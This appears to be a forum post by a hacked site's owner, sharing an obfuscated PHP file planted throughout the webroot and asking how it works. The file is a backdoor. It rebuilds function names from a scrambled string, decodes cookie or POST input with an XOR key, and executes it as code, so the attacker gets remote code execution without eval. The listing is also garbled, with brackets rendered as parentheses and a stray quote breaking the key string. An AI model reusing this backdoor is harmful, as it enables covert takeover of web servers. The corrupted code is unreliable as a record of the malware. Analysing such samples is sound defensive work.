Somebody hacked my webserver and uploaded many of the following files with random names in different subdirectories of my webroot. The file looks something like this and – even though I managed to beautify it – I am unable to decipher the obfuscation.

I can see that potential code injection is happening using the `$_POST`

and `$_COOKIE`

variables, but what I find very interesting is the lack of any `eval`

calls, the function is even deactivated in my php.ini.

Anyway here’s the code and I’d appreciate any kind of insights:

```
<?php
$wldxznb = 'r5a3m#uvplebgsH'co*6i8-_7tx14nfk0yd';
$vcekj = Array();
$vcekj() = $wldxznb(16) . $wldxznb(0) . $wldxznb(10) . $wldxznb(2) . $wldxznb(25) . $wldxznb(10) . $wldxznb(23) . $wldxznb(30) . $wldxznb(6) . $wldxznb(29) . $wldxznb(16) . $wldxznb(25) . $wldxznb(20) . $wldxznb(17) . $wldxznb(29);
$vcekj() = $wldxznb(14) . $wldxznb(18);
$vcekj() = $wldxznb(1) . $wldxznb(16) . $wldxznb(21) . $wldxznb(30) . $wldxznb(10) . $wldxznb(34) . $wldxznb(10) . $wldxznb(16) . $wldxznb(22) . $wldxznb(10) . $wldxznb(21) . $wldxznb(27) . $wldxznb(32) . $wldxznb(22) . $wldxznb(28) . $wldxznb(30) . $wldxznb(16) . $wldxznb(2) . $wldxznb(22) . $wldxznb(11) . $wldxznb(11) . $wldxznb(27) . $wldxznb(19) . $wldxznb(22) . $wldxznb(3) . $wldxznb(27) . $wldxznb(1) . $wldxznb(11) . $wldxznb(28) . $wldxznb(34) . $wldxznb(34) . $wldxznb(24) . $wldxznb(2) . $wldxznb(34) . $wldxznb(19) . $wldxznb(34);
$vcekj() = $wldxznb(5);
$vcekj() = $wldxznb(16) . $wldxznb(17) . $wldxznb(6) . $wldxznb(29) . $wldxznb(25);
$vcekj() = $wldxznb(13) . $wldxznb(25) . $wldxznb(0) . $wldxznb(23) . $wldxznb(0) . $wldxznb(10) . $wldxznb(8) . $wldxznb(10) . $wldxznb(2) . $wldxznb(25);
$vcekj() = $wldxznb(10) . $wldxznb(26) . $wldxznb(8) . $wldxznb(9) . $wldxznb(17) . $wldxznb(34) . $wldxznb(10);
$vcekj() = $wldxznb(13) . $wldxznb(6) . $wldxznb(11) . $wldxznb(13) . $wldxznb(25) . $wldxznb(0);
$vcekj() = $wldxznb(2) . $wldxznb(0) . $wldxznb(0) . $wldxznb(2) . $wldxznb(33) . $wldxznb(23) . $wldxznb(4) . $wldxznb(10) . $wldxznb(0) . $wldxznb(12) . $wldxznb(10);
$vcekj() = $wldxznb(13) . $wldxznb(25) . $wldxznb(0) . $wldxznb(9) . $wldxznb(10) . $wldxznb(29);
$vcekj() = $wldxznb(8) . $wldxznb(2) . $wldxznb(16) . $wldxznb(31);
foreach ($vcekj(8)($_COOKIE, $_POST) as $wxusr => $pjrusp)
{
function wwdlf($vcekj, $wxusr, $qwdotr)
{
return $vcekj(7)($vcekj(5)($wxusr . $vcekj(2), ($qwdotr / $vcekj(9)($wxusr)) + 1) , 0, $qwdotr);
}
function irngfrj($vcekj, $axsex)
{
return @$vcekj(10)($vcekj(1), $axsex);
}
function vadod($vcekj, $axsex)
{
$onlwwe = $vcekj(4)($axsex) % 3;
if (!$onlwwe)
{
$zznqw = $vcekj(0);
$juptpoi = $zznqw("", $axsex(1)($axsex(2)));
$juptpoi();
exit();
}
}
$pjrusp = irngfrj($vcekj, $pjrusp);
vadod($vcekj, $vcekj(6)($vcekj(3), $pjrusp ^ wwdlf($vcekj, $wxusr, $vcekj(9)($pjrusp))));
}
```